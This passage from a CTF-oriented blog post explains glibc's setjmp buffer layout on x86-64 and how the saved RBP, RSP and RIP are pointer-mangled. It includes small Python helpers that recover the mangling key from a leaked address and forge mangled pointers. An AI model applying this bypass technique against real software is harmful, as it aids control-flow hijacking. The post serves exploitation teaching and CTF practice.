&lt;pre&gt;&lt;code&gt;//glibc https://elixir.bootlin.com/glibc/glibc-2.43.9000/source/setjmp/bits/types/struct___jmp_buf_tag.h#L26
/* Calling environment, plus possibly a saved signal mask.  */
struct __jmp_buf_tag
{
	__jmp_buf __jmpbuf;		/* Calling environment.  */
	int __mask_was_saved;	/* Saved the signal mask?  */
	__sigset_t __saved_mask;	/* Saved signal mask.  */
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This struct doesn&apos;t really tell us much. Why are we now reading the word signal? Well, there is a variation of &lt;code&gt;setjmp&lt;/code&gt; called &lt;code&gt;sigsetjmp&lt;/code&gt; (along with &lt;code&gt;siglongjmp&lt;/code&gt;) that also saves the signal mask into the buffer.&lt;/p&gt;
&lt;p&gt;So for our case, only the first element of &lt;code&gt;__jmp_buf_tag&lt;/code&gt; is interesting. Let&apos;s look at it:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc https://elixir.bootlin.com/glibc/glibc-2.43.9000/source/sysdeps/x86/bits/setjmp.h#L31
typedef long int __jmp_buf[8];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It&apos;s literally an 8-element, 64-bit integer array, nothing special. If we want to understand how the values are saved inside this array, it is easier to look directly through the lens of a debugger than to search through a huge amount of different implementations of &lt;code&gt;setjmp&lt;/code&gt; for all architectures. For x86-64, this is the &lt;code&gt;__jmp_buf[8]&lt;/code&gt; struct:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;code&gt;__jmp_buf[8]&lt;/code&gt;&lt;/th&gt;
&lt;th&gt;is mangled&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;RBX&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;RBP&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;R12&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;R13&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;R14&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;R15&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;RSP&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;RIP&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;Wait, what does &lt;em&gt;mangled&lt;/em&gt; mean? Well, let&apos;s look at this example of a &lt;code&gt;__jmp_buf[8]&lt;/code&gt; struct:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/struct_in_memory.webp&quot; alt=&quot;__jmp_buf shown in pwndbg&quot; /&gt;&lt;/p&gt;
&lt;p&gt;As you can notice, RBP, RSP, and RIP should all be addresses, but they got mangled in some way. This means that we cannot simply overwrite them with a new address to modify these registers.&lt;/p&gt;
&lt;h3&gt;breaking the mangling&lt;/h3&gt;
&lt;p&gt;By setting a breakpoint in the &lt;code&gt;__longjmp&lt;/code&gt; function in GDB, it is possible to understand exactly how the function demangles the pointers.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/image.webp&quot; alt=&quot;Asm that demangles the pointer in __longjmp&quot; /&gt;
&lt;img src=&quot;./images/image-1.webp&quot; alt=&quot;last instruction of the function&quot; /&gt;&lt;/p&gt;
&lt;p&gt;It first executes a &lt;code&gt;ror&lt;/code&gt; of 17 bits (&lt;code&gt;0x11&lt;/code&gt;), and then it XORs the resulting value with a predetermined key taken from the Thread Control Block at offset &lt;code&gt;0x30&lt;/code&gt; (&lt;code&gt;fs:0x30&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;:::note
When the OS loads a binary, it stores two qwords of random data in the Thread Control Block (TCB). The first qword is used as a stack canary (&lt;code&gt;fs:0x28&lt;/code&gt;), and the second qword is used for pointer mangling. The &lt;code&gt;exit_funcs&lt;/code&gt; use the same mangling key as &lt;code&gt;setjmp&lt;/code&gt; (&lt;a href=&quot;https://blog.davidherm.es/posts/babyheap_2/#exploiting-with-exit_func-overwrite&quot;&gt;link&lt;/a&gt; to an old writeup).
:::&lt;/p&gt;
&lt;p&gt;This means that as long as we have a leak of the return address, it is possible, for example, to recover the key this way:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def recover_key(mangled_addr:int, real_addr:int):
	return ror(mangled_addr, 0x11, 64) ^ real_addr
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;After that, we can mangle an arbitrary pointer by doing the reverse of the demangling operation:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def mangle_addr(real_addr:int, key:int):
	return rol(real_addr ^ key, 0x11, 64)
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;CTF challenges&lt;/h2&gt;
&lt;p&gt;If you want to try this technique, I will add a list of challenges below:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;txvm (Teamitaly 2026 Quals): waiting for release&lt;/li&gt;
&lt;/ul&gt;
</content:encoded><author>David Hermes</author></item></channel></rss>